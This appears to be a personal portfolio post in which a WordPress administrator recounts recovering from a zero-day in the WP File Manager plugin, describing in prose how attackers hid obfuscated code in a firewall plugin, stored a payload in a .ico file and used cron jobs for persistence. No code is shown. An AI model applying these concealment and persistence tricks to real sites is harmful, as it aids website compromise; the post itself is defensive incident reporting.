Not something most people would even put on a portfolio but regardless this was my crowning moment into becoming a WordPress Master. When I first started at ILC working with 18 WordPress installs I did have help for maintenance by a third-party vendor. Albeit I did not use them for major products they did a good job of keeping our WordPress installs up to date. Which is huge in helping prevent website hacks and other malicious activity. To accomplish this the teams main tool was a WordPress plugin called WP File Manager.
A zero day hack is when a vulnerability is discovered in a system that the owners, the people that create the system, are not aware of at all. A vulnerability that can give malicious actors full control of that system. One morning Wp File Manager got hit with a Zero Day. All of my defenses firewalls, operating system hardening, control rules get torn apart and attackers get into most of our websites.
After discovery I did contact the vendor after struggling with fighting it. They were no help. Without Wp File Manager they were not able to access the website files any other way. So I set to work.
I will give the attackers this…It was a beautifully evil designed piece of malicious code. What they did is they would forward our websites to a different place ONLY the first time a device loaded the site. After that it worked as normal. An absolute troubleshooting nightmare.
One of the first things I was able to figure out was why my Firewall was not seeing anything. When I pulled up the code of the Wordfence Premium plugin a noticed the scroll bar went to the right… very far to the right.
The attackers added code to the firewall plugin to block detection. The code in question all in one line and obfuscated.
After deletion I found all of the holes and boy was there alot of holes! What the hack did was add a TON of pointers in code to a ton of different wordpress files al pointing to a .ico file that held the hack. This code was also obfuscated so I found a quick php deobfuscator online and was able to decode where the file was hidden. After deleting the file it went away!
Then I just had to remove all the bad code and plug up any holes and such that the attackers added. Especially deleting the cron jobs to re-add all of the bad code and .ico file. That was fun to find the next morning.
All in all a great learning experience and would lead to be handling all of the websites solo with no more vendors for assistance.